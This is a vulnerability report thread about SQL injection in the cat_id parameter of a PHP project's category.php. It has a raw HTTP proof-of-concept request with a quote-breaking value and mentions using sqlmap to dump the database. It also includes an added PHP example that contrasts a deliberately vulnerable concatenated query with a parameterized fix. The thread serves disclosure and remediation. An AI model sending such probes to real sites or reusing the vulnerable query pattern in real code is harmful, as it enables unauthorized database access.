Hello, I found that there is a SQL injection vulnerability in the cat_id parameter of the category.php file on the website. Entering single quotes in this parameter will cause the webpage to burst and the database statement to burst. And this parameter can be used by sqlmap to obtain data information in the database.
POC:
GET /category.php?cat_id=1%27 HTTP/1.1
Host: victor.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ia9ksoo6lq6dticsuoddv0gh20
Connection: close
Hello @ztxyzwd, this is a project I worked on a few years back while learning PHP, so it's prone to have a lot of bugs. Regardless of that, if there is a fix, or rather a PR that fixes those issues, I would be glad to merge it.
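The shape of a fix for the reported `cat_id` handling, as an added example that is not the project's own code (the project's query is not shown in this thread). It assumes PDO with an in-memory SQLite database so it runs stand-alone; the `posts` table and both function names are hypothetical.

```php
<?php
// Added example: schema, table and function names are hypothetical.
declare(strict_types=1);

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE posts (id INTEGER PRIMARY KEY, cat_id INTEGER, title TEXT)");
$db->exec("INSERT INTO posts (cat_id, title) VALUES (1, 'First post'), (2, 'Other category')");

// Vulnerable pattern: the raw parameter is concatenated into the statement,
// so a stray quote changes the SQL grammar instead of being treated as data.
function postsByCategoryUnsafe(PDO $db, string $catId): array
{
    $sql = "SELECT id, title FROM posts WHERE cat_id = '" . $catId . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened pattern: accept only a positive integer, then bind it as a parameter.
function postsByCategorySafe(PDO $db, string $catId): array
{
    $id = filter_var($catId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return []; // caller should answer 400/404 with no SQL detail
    }
    $stmt = $db->prepare('SELECT id, title FROM posts WHERE cat_id = :cat_id');
    $stmt->bindValue(':cat_id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// "1'" is the decoded value of cat_id=1%27 from the report.
foreach (['1', "1'"] as $input) {
    $label = var_export($input, true);
    try {
        $rows = postsByCategoryUnsafe($db, $input);
        echo "unsafe {$label}: " . count($rows) . " row(s)\n";
    } catch (PDOException $e) {
        // Log server-side; never echo the driver message or the statement to the page.
        error_log('category query failed: ' . $e->getMessage());
        echo "unsafe {$label}: query failed (details logged only)\n";
    }
    echo "safe   {$label}: " . count(postsByCategorySafe($db, $input)) . " row(s)\n";
}
```

In production, `display_errors` should also be off so that a failed statement is never rendered into the response.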